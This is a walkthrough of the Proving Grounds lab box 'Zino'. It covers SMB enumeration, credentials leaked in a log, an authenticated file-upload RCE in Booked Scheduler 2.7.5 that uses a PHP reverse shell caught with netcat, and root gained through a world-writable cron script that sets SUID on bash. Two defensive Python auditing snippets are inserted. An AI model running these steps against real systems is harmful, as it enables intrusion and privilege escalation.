Zino
Exploitation Guide for Zino | Proving Grounds
In this walkthrough we will get the credential for the web application from SMB; the application is vulnerable to an authenticated RCE. We will then exploit a cron job to escalate our privileges.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/scans]
└─$ nmap $ip -p- -vv -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
3306/tcp open mysql syn-ack
8003/tcp open mcreport syn-ack
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql?
8003/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-02-05 21:02 booked/
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
List the shares using smbclient.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/scans]
└─$ smbclient -L \\$ip -U "" -N -p 445 1 ⨯
Sharename Type Comment
--------- ---- -------
zino Disk Logs
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
There is a share named zino which contains logs. Log in to SMB and, if anonymous login is enabled, download all the files to your machine.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/scans]
└─$ smbclient '//192.168.233.64/zino' -p 445
Enter WORKGROUP\imtodess's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 9 15:11:49 2020
.. D 0 Tue Apr 28 09:38:53 2020
.bash_history H 0 Tue Apr 28 11:35:28 2020
error.log N 265 Tue Apr 28 10:07:32 2020
.bash_logout H 220 Tue Apr 28 09:38:53 2020
local.txt N 33 Thu Aug 26 01:06:46 2021
.bashrc H 3526 Tue Apr 28 09:38:53 2020
.gnupg DH 0 Tue Apr 28 10:17:02 2020
.profile H 807 Tue Apr 28 09:38:53 2020
misc.log N 424 Tue Apr 28 10:08:15 2020
auth.log N 368 Tue Apr 28 10:07:54 2020
access.log N 5464 Tue Apr 28 10:07:09 2020
ftp D 0 Tue Apr 28 10:12:56 2020
smb: \> mget *
Get file .bash_history? y
NT_STATUS_ACCESS_DENIED opening remote file \.bash_history
Get file error.log? y
getting file \error.log of size 265 as error.log (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
Get file .bash_logout? y
getting file \.bash_logout of size 220 as .bash_logout (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
Get file local.txt? y
getting file \local.txt of size 33 as local.txt (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
Get file .bashrc? y
getting file \.bashrc of size 3526 as .bashrc (2.3 KiloBytes/sec) (average 0.9 KiloBytes/sec)
Get file .profile? y
getting file \.profile of size 807 as .profile (0.8 KiloBytes/sec) (average 0.9 KiloBytes/sec)
Get file misc.log? y
getting file \misc.log of size 424 as misc.log (0.4 KiloBytes/sec) (average 0.8 KiloBytes/sec)
Get file auth.log? y
getting file \auth.log of size 368 as auth.log (0.4 KiloBytes/sec) (average 0.8 KiloBytes/sec)
Get file access.log? y
getting file \access.log of size 5464 as access.log (5.6 KiloBytes/sec) (average 1.3 KiloBytes/sec)
In one of those log files we find the credential admin:adminadmin.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/loot]
└─$ cat misc.log
Apr 28 08:39:01 zino systemd[1]: Starting Clean php session files...
Apr 28 08:39:01 zino CRON[2791]: (CRON) info (No MTA installed, discarding output)
Apr 28 08:39:01 zino systemd[1]: phpsessionclean.service: Succeeded.
Apr 28 08:39:01 zino systemd[1]: Started Clean php session files.
Apr 28 08:39:01 zino systemd[1]: Set application username "admin"
Apr 28 08:39:01 zino systemd[1]: Set application password "adminadmin"
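The credential above was written into a log file that an anonymous share then exposed. As an added example that is not part of the original walkthrough, the following Python scans syslog-style lines pulled from such a share for credential-like values and reports each hit with the secret masked; the sample lines are the misc.log entries above, while the regexes and function names are my own.

```python
import re

# Constructed sample: the four syslog lines shown above from the share's
# misc.log (two benign, two that embed the application's credentials).
SAMPLE_LOG = """\
Apr 28 08:39:01 zino systemd[1]: Starting Clean php session files...
Apr 28 08:39:01 zino CRON[2791]: (CRON) info (No MTA installed, discarding output)
Apr 28 08:39:01 zino systemd[1]: Set application username "admin"
Apr 28 08:39:01 zino systemd[1]: Set application password "adminadmin"
"""

# syslog prefix: "Mon DD HH:MM:SS host program[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\[:]+)(?:\[\d+\])?: (?P<msg>.*)$")
# a secret-ish keyword, an optional separator, then a quoted or bare value
SECRET_RE = re.compile(
    r"\b(?P<kind>password|passwd|secret|token|api[_-]?key)\b\s*[:=]?\s*"
    r"[\"']?(?P<val>[^\"'\s]+)", re.IGNORECASE)

def mask(value):
    """Keep the first character so findings can be correlated without re-leaking the value."""
    return value[:1] + "*" * (len(value) - 1)

def find_secret_leaks(log_text):
    """Return one finding per syslog line whose message embeds a credential-like value."""
    findings = []
    for line in log_text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue  # not syslog-shaped; skip rather than guess
        s = SECRET_RE.search(m.group("msg"))
        if not s:
            continue
        findings.append({
            "ts": m.group("ts"),
            "prog": m.group("prog"),
            "kind": s.group("kind").lower(),
            "masked": mask(s.group("val")),
        })
    return findings

if __name__ == "__main__":
    for f in find_secret_leaks(SAMPLE_LOG):
        print("%(ts)s %(prog)s leaked %(kind)s=%(masked)s" % f)
```

Run it over every log copied from the share (cat *.log | python3 thisfile.py, after swapping SAMPLE_LOG for sys.stdin.read()) to see which files need their logging fixed and their share permissions tightened.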
Log in to the web application using the credential we found earlier. We successfully logged in. It is Booked Scheduler version 2.7.5.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/loot]
└─$ searchsploit booked
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) | php/webapps/46486.rb
Booked Scheduler 2.7.7 - Authenticated Directory Traversal | php/webapps/48428.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There is an RCE for version 2.7.5. A Metasploit module is available, but we will do it manually.
Description of the vulnerability (from the exploit): we just need to upload a malicious shell on /Web/admin/manage_theme.php under favicon, then visit /Web/custom-favicon.php to trigger the shell.
Upload the shell. I used the php reverse shell from https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php. If you are using Kali then it is readily available in /usr/share/webshells/php/php-reverse-shell.php.
Now start a netcat listener and visit booked/Web/custom-favicon.php.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/zino/exploit]
└─$ nc -nvlp 8003 1 ⨯
listening on [any] 8003 ...
connect to [192.168.49.233] from (UNKNOWN) [192.168.233.64] 49342
Linux zino 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
01:33:20 up 3:52, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")' # upgrading shell to interactive
Get your local flag.
www-data@zino:/home/peter$ ls
access.log auth.log error.log ftp local.txt misc.log
Check if there is any cron job running. In our case there is one cron job running which executes a python script as root.
www-data@zino:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/3 * * * * root python /var/www/html/booked/cleanup.py
Check the permissions of the script.
www-data@zino:/tmp$ ls -la /var/www/html/booked/cleanup.py
-rwxrwxrwx 1 www-data www-data 120 Jul 3 04:22 /var/www/html/booked/cleanup.py
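The root cause of the escalation that follows is a root cron job whose script is world-writable. As an added example (not part of the walkthrough), this Python audits a system crontab for exactly that: it parses the job lines, collects the absolute paths each root job references, and flags any that a non-root user owns or that are group/world writable. The crontab sample and the stat table are constructed from the output shown above; on a live host, audit_crontab(open("/etc/crontab").read()) uses the real os.stat.

```python
import os
# Constructed: the job lines of the system crontab shown above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/3 * * * * root python /var/www/html/booked/cleanup.py
"""
# Constructed stand-in for stat(): uid and mode as the walkthrough shows them for
# cleanup.py (www-data is uid 33), plus a properly root-owned directory for contrast.
FAKE_STAT = {
    "/var/www/html/booked/cleanup.py": (33, 0o100777),
    "/etc/cron.hourly": (0, 0o040755),
}

def parse_system_crontab(text):
    """(user, command) pairs from a system crontab: 5 schedule fields, user, command."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs

def local_stat(path):  # (uid, mode) for a path on this host, None if absent
    st = os.stat(path) if os.path.exists(path) else None
    return (st.st_uid, st.st_mode) if st else None

def audit_crontab(text, stat_lookup=local_stat):
    """Flag root jobs that reference a file a non-root user owns or can write to."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        if user != "root":
            continue
        for path in (t for t in cmd.split() if t.startswith("/")):
            info = stat_lookup(path)  # interpreter, script or argument path
            if info is None:
                continue
            uid, mode = info
            reasons = []
            if uid != 0:
                reasons.append("owned by uid %d" % uid)
            if mode & 0o022:
                reasons.append("mode %o is group/world writable" % (mode & 0o777))
            if reasons:
                findings.append((path, cmd, "; ".join(reasons)))
    return findings
```

The fix for a flagged entry is to make the script root-owned and not writable by anyone else (chown root:root, chmod 755), or to run the job as the unprivileged user that already owns it.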
Great, we can write to the file. You can do various things with this, but for this walkthrough we will change the permissions of /bin/bash and get a root shell. You can try to get a reverse shell if you want.
Remove the previous command and replace it with the following.
www-data@zino:/var/www/html/booked$ cat cleanup.py
#!/usr/bin/env python
import os
import sys
os.system('chmod +s /bin/bash')
After some time the permissions of /bin/bash will look like this.
www-data@zino:/var/www/html/booked$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
Now just run /bin/bash -p and you will have a root shell.
www-data@zino:/var/www/html/booked$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# cd /root
bash-5.0# cat proof.txt
999e78a<Redacted>5dbf30f2